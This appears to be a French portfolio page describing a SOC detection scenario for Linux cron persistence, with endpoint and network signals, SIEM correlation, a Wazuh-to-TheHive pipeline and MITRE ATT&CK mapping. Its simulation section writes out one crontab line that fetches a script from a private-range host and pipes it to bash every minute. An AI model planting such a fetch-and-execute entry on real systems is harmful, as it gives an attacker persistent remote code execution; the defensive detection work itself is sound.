Détection de persistance Linux via cron

Persistance Linux via cron
cat case.md

SOC Detection Scenario

Détection de persistance Linux via cron

Ce scénario simule l’ajout d’une tâche planifiée malveillante dans crontab afin de maintenir une persistance sur un hôte Linux. L’objectif est d’identifier la modification, de la corréler avec des signaux réseau suspects et de qualifier l’activité dans une logique SOC.

Linux Cron Wazuh Suricata SOC
← Retour aux projets
more details.txt

Contexte

context

Le scénario vise à détecter une tentative de persistance sur un système Linux via la modification de crontab. Cette technique permet à un attaquant d’exécuter automatiquement une commande ou un script à intervalles réguliers, afin de conserver un accès ou relancer une charge utile.

Simulation

attack

Le comportement est simulé par l’ajout d’une entrée cron exécutant périodiquement une requête réseau vers une ressource externe. 

* * * * * curl http://192.168.56.10/ping.sh | bash

Signal initial

signal

Le signal peut être observé à deux niveaux complémentaires :

  • au niveau endpoint, via la détection de modification de crontab ou l’exécution de crontab -e ;
  • au niveau réseau, via une activité HTTP sortante répétitive vers une destination inhabituelle.

Détection endpoint

hids

Côté endpoint, l’analyse porte sur les événements liés à la création ou modification des tâches planifiées, l’utilisateur concerné, le contenu ajouté et les binaires appelés par la tâche comme curl, wget, bash ou sh.

Détection réseau

nids

Sur le plan réseau, une détection peut être déclenchée lorsqu’un hôte Linux contacte régulièrement une adresse IP ou une URL anormale peu après une modification de tâche planifiée. 

Outbound HTTP connection after cron persistence change

Analyse

analysis

L’analyse consiste à vérifier :

  • la commande ajoutée à la crontab ;
  • l’utilisateur qui a effectué la modification ;
  • l’heure exacte du changement ;
  • la fréquence de la tâche ;
  • la destination réseau contactée ensuite ;
  • les événements corrélés avant et après l’alerte.

Corrélation SIEM

correl
Crontab modified on Linux host
+
Recurring outbound network activity
=
Possible persistence with remote command retrieval or beaconing

Pipeline SOC

pipeline

La chaîne SOC suit ce flux : 

Crontab modification on host
↓
Endpoint / network logs
↓
Wazuh ingestion
↓
Correlation and alerting
↓
Case creation in TheHive
↓
IOC enrichment in Cortex

Qualification

result

Le cas est qualifié comme activité potentiellement malveillante, car la persistance par tâche planifiée est une technique fréquemment utilisée pour maintenir l’exécution d’actions discrètes sur un système compromis. La présence d’une communication réseau sortante après modification de crontab renforce fortement le niveau de suspicion.

MITRE ATT&CK

mitre
  • T1053.003 — Scheduled Task/Job: Cron
  • T1071.001 — Application Layer Protocol: Web Protocols
  • T1105 — Ingress Tool Transfer

Ce que ça montre

impact

Ce projet met en avant ta capacité à détecter un mécanisme de persistance Linux réaliste, à corréler les signaux endpoint et réseau, puis à restituer l’incident dans une logique SOC exploitable. C’est très pertinent pour une alternance en Blue Team, SOC ou Detection Engineering.